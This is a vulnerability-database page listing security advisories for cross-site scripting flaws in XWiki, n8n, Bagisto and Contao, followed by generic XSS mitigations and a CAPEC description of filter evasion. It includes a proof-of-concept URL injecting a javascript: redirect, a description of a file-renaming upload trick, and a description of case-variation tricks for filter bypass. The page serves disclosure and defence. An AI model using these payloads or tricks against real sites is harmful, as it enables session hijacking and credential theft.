              "fixed": "14.10.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.xwiki.platform:xwiki-platform-appwithinminutes-ui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "15.0-rc-1"
            },
            {
              "fixed": "15.1-rc-1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-35161"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79",
      "CWE-87"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-06-22T20:00:00Z",
    "nvd_published_at": "2023-06-23T19:15:09Z",
    "severity": "CRITICAL"
  },
  "details": "### Impact\nUsers are able to forge an URL with a payload allowing to inject Javascript in the page (XSS).\nIt\u0027s possible to exploit the DeleteApplication page to perform a XSS, e.g. by using URL such as:\n\n\u003e xwiki/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu\u0026resolve=true\u0026xredirect=javascript:alert(document.domain)\n\nThis vulnerability exists since XWiki 6.2-milestone-1.\n\n### Patches\n\nThe vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1.\n\n### Workarounds\n\nIt\u0027s possible to workaround the vulnerability by editing the page AppWithinMinutes.DeleteApplication to perform checks on it, but note that the appropriate fix involves new APIs that have been recently introduced in XWiki. See the referenced jira tickets.\n\n### References\n\n  * Jira ticket about the vulnerability: https://jira.xwiki.org/browse/XWIKI-20614\n  * Introduction of the macro used for fixing all those vulnerabilities: https://jira.xwiki.org/browse/XWIKI-20583\n  * Commit containing the actual fix in the page: https://github.com/xwiki/xwiki-platform/commit/8f5a889b7cd140770e54f5b4195d88058790e305\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)\n* Email us at [Security Mailing List](mailto:security@xwiki.org)\n",
  "id": "GHSA-4xm7-5q79-3fch",
  "modified": "2023-06-22T20:00:00Z",
  "published": "2023-06-22T20:00:00Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-4xm7-5q79-3fch"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35161"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xwiki/xwiki-platform/commit/8f5a889b7cd140770e54f5b4195d88058790e305"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/xwiki/xwiki-platform"
    },
    {
      "type": "WEB",
      "url": "https://jira.xwiki.org/browse/XWIKI-20583"
    },
    {
      "type": "WEB",
      "url": "https://jira.xwiki.org/browse/XWIKI-20614"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "XWiki Platform vulnerable to reflected cross-site scripting via xredirect parameter in DeleteApplication page"
}

GHSA-537J-GQPC-P7FQ

Vulnerability from github – Published: 2026-04-29 21:23 – Updated: 2026-05-08 01:31
VLAI
Summary
n8n Vulnerable to XSS via MCP OAuth client
Details

Impact

An unauthenticated attacker could register a malicious MCP OAuth client with a crafted client_name. If a victim user authorized the OAuth consent dialog and a second user subsequently revoked that access, a toast notification would render the injected script. Clicking the link would execute arbitrary JavaScript in the victim's authenticated n8n browser session, enabling credential and session token theft, workflow manipulation, or privilege escalation.

Patches

This issue has been fixed in n8n version 2.14.2. Users should upgrade to this version or later to remediate the vulnerability.

Workarounds

If upgrading is not immediately possible, administrators should consider the following temporary mitigations: - Restrict access to the n8n instance and the MCP OAuth registration endpoint to trusted users only. - Disable MCP server functionality if it is not actively required.

These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "n8n"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.123.32"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "n8n"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.18.0"
            },
            {
              "fixed": "2.18.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "n8n"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.17.0"
            },
            {
              "fixed": "2.17.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42235"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79",
      "CWE-87"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-29T21:23:04Z",
    "nvd_published_at": "2026-05-04T19:16:06Z",
    "severity": "HIGH"
  },
  "details": "## Impact\nAn unauthenticated attacker could register a malicious MCP OAuth client with a crafted `client_name`. If a victim user authorized the OAuth consent dialog and a second user subsequently revoked that access, a toast notification would render the injected script. Clicking the link would execute arbitrary JavaScript in the victim\u0027s authenticated n8n browser session, enabling credential and session token theft, workflow manipulation, or privilege escalation.\n\n## Patches\nThis issue has been fixed in n8n version 2.14.2. Users should upgrade to this version or later to remediate the vulnerability.\n\n## Workarounds\nIf upgrading is not immediately possible, administrators should consider the following temporary mitigations:\n- Restrict access to the n8n instance and the MCP OAuth registration endpoint to trusted users only.\n- Disable MCP server functionality if it is not actively required.\n\nThese workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.",
  "id": "GHSA-537j-gqpc-p7fq",
  "modified": "2026-05-08T01:31:29Z",
  "published": "2026-04-29T21:23:04Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/n8n-io/n8n/security/advisories/GHSA-537j-gqpc-p7fq"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42235"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/n8n-io/n8n"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:L/SC:H/SI:H/SA:L",
      "type": "CVSS_V4"
    }
  ],
  "summary": "n8n Vulnerable to XSS via MCP OAuth client"
}

GHSA-67PX-R26W-598X

Vulnerability from github – Published: 2025-10-16 18:12 – Updated: 2025-10-16 21:54
VLAI
Summary
bagisto has Cross Site Scripting (XSS) issue in TinyMCE Image Upload (HTML)
Details

Summary

In Bagisto v2.3.7, the TinyMCE image upload functionality allows an attacker with sufficient privileges (e.g. admin) to upload a crafted HTML file containing embedded JavaScript. When viewed, the malicious code executes in the context of the admin/user’s browser.

Details

The application blocks the uploading of HTML files; however, if the backend detected that the content of the .png file is HTML or JavaScript, the file extension will be automatically converted from .png to .html. When the HTML is viewed, it will execute the JavaScript code.

PoC

Created a html file, renamed the extension to .png, and uploaded the file. It was converted to HTML file in the backend. When opened in another tab, the JavaScript code will execute. image image

Impact

A aalicious script is stored in HTML file and executed when the content is viewed. An attacker (with upload privilege) can target other admin users or editors who view the content, enabling session hijacking, unauthorized actions, or privilege escalation.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.3.7"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "bagisto/bagisto"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.3.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-62415"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79",
      "CWE-80",
      "CWE-87"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-16T18:12:10Z",
    "nvd_published_at": "2025-10-16T19:15:34Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nIn Bagisto v2.3.7, the TinyMCE image upload functionality allows an attacker with sufficient privileges (e.g. admin) to upload a crafted HTML file containing embedded JavaScript. When viewed, the malicious code executes in the context of the admin/user\u2019s browser.\n\n### Details\nThe application blocks the uploading of HTML files; however, if the backend detected that the content of the .png file is HTML or JavaScript, the file extension will be automatically converted from .png to .html. When the HTML is viewed, it will execute the JavaScript code.\n\n### PoC\nCreated a html file, renamed the extension to .png, and uploaded the file. It was converted to HTML file in the backend. When opened in another tab, the JavaScript code will execute.\n\u003cimg width=\"1605\" height=\"702\" alt=\"image\" src=\"https://github.com/user-attachments/assets/bd9406aa-2380-464f-ac21-32d483639969\" /\u003e\n\u003cimg width=\"1358\" height=\"314\" alt=\"image\" src=\"https://github.com/user-attachments/assets/e5a64a5a-39fb-4fdb-ada9-14c4b9554803\" /\u003e\n\n### Impact\nA aalicious script is stored in HTML file and executed when the content is viewed. An attacker (with upload privilege) can target other admin users or editors who view the content, enabling session hijacking, unauthorized actions, or privilege escalation.",
  "id": "GHSA-67px-r26w-598x",
  "modified": "2025-10-16T21:54:25Z",
  "published": "2025-10-16T18:12:10Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/bagisto/bagisto/security/advisories/GHSA-67px-r26w-598x"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62415"
    },
    {
      "type": "WEB",
      "url": "https://github.com/bagisto/bagisto/commit/7b6b1dd639a14e7053bb82ef2f971c1f533fdfab"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/bagisto/bagisto"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "bagisto has Cross Site Scripting (XSS) issue in TinyMCE Image Upload (HTML)"
}

GHSA-68Q5-78XP-CWWC

Vulnerability from github – Published: 2025-11-25 20:48 – Updated: 2025-11-27 08:59
VLAI
Summary
Contao is vulnerable to cross-site scripting in templates
Details

Impact

It is possible to inject code into the template output that will be executed in the browser in the front end and back end.

Patches

Update to Contao 4.13.57, 5.3.42 or 5.6.5.

Workarounds

Do not use the affected templates or patch them manually.

Refsources

https://contao.org/en/security-advisories/cross-site-scripting-in-templates

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "contao/core-bundle"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "4.13.57"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "contao/core-bundle"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0-RC1"
            },
            {
              "fixed": "5.3.42"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "contao/core-bundle"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.4.0-RC1"
            },
            {
              "fixed": "5.6.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-65961"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79",
      "CWE-87"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-11-25T20:48:13Z",
    "nvd_published_at": "2025-11-25T19:15:51Z",
    "severity": "LOW"
  },
  "details": "### Impact\n\nIt is possible to inject code into the template output that will be executed in the browser in the front end and back end.\n\n### Patches\n\nUpdate to Contao 4.13.57, 5.3.42 or 5.6.5.\n\n### Workarounds\n\nDo not use the affected templates or patch them manually.\n\n### Refsources\n\nhttps://contao.org/en/security-advisories/cross-site-scripting-in-templates",
  "id": "GHSA-68q5-78xp-cwwc",
  "modified": "2025-11-27T08:59:34Z",
  "published": "2025-11-25T20:48:13Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/contao/contao/security/advisories/GHSA-68q5-78xp-cwwc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65961"
    },
    {
      "type": "WEB",
      "url": "https://contao.org/en/security-advisories/cross-site-scripting-in-templates"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/contao/contao"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Contao is vulnerable to cross-site scripting in templates"
}

Mitigation
Implementation

Resolve all input to absolute or canonical representations before processing.

Mitigation
Implementation

Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including tag attributes, hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended.

Mitigation MIT-30.1
Implementation

Strategy: Output Encoding

  • Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.
  • The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks.
Mitigation MIT-43
Implementation

With Struts, write all data from form beans with the bean's filter attribute set to true.

Mitigation MIT-31
Implementation

Strategy: Attack Surface Reduction

To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XmlHttpRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.

CAPEC-199: XSS Using Alternate Syntax

An adversary uses alternate forms of keywords or commands that result in the same action as the primary form but which may not be caught by filters. For example, many keywords are processed in a case insensitive manner. If the site's web filtering algorithm does not convert all tags into a consistent case before the comparison with forbidden keywords it is possible to bypass filters (e.g., incomplete black lists) by using an alternate case structure. For example, the "script" tag using the alternate forms of "Script" or "ScRiPt" may bypass filters where "script" is the only form tested. Other variants using different syntax representations are also possible as well as using pollution meta-characters or entities that are eventually ignored by the rendering engine. The attack can result in the execution of otherwise prohibited functionality.